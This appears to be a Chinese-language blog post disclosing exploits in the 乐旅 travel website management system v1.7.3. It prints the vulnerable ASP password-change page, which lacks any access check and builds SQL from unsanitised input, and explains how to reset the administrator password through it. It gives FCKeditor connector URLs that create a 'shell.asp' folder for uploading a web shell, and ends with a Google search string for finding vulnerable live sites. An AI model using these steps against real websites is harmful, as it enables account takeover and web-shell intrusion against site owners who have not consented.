漏洞程序：乐旅旅游网站管理系统v1.7.3
影响版本：v1.7.3
漏洞利用过程：
第一：
管理员目录下的Admin_Passod.asp

<!--#include file="../Include/conn.asp"-->
<!--#include file="../Include/md5.asp"-->
<%
select case request.QueryString("Action")
case "ModifyPass"
    SaveNewPass
case else
end select
set rs = server.createobject("adodb.recordset")
sql="select * from Lelv_w_manage order by id desc"
rs.open sql,conn,1,3
AdminName=rs("AdminName")
rs.close
%>
function SaveNewPass()
dim LoginName,rs,sql
LoginName=request("AdminName")
set rs = server.createobject("adodb.recordset")
sql="select * from Lelv_w_manage where AdminName='"&LoginName&"'"
rs.open sql,conn,1,3
if rs.bof and rs.eof then
    response.write "读取数据库记录出错！"
    response.end
else
if len(trim(Request.Form("NewPassword")))<6 or len(trim(Request.Form("NewPassword")))>20 then
      response.write "<script language=javascript> alert('管理员密码必填，且字符数为6-20位！');history.back(-1);</script>"
      response.end
    end if
if Request.Form("NewPassword")<>Request.Form("vNewPassword") then
      response.write "<script language=javascript> alert('两次输入的密码不一样！');history.back(-1);</script>"
      response.end
end if
rs("Password")=Md5(Request.Form("NewPassword"))
    rs.update
    rs.close
这个文件是用来修改密码的。但作者未对这个文件做访问限制。
所以我们可以利用它来修改管理员的密码。
利用方法很简单：
引用
http://localhost/admin/Admin_Passod.asp
第二：
FCK上传漏洞，最近看到很多程序都存在这个漏洞。
引用
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
http://localhost/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

www.si1ence.cn    si1ence'blog

官网不存在第一个问题，一是修改了后台路径的，二是删除了那个文件的。
在Google输入关键字：
inurl:Plan_Show.asp?InfoId=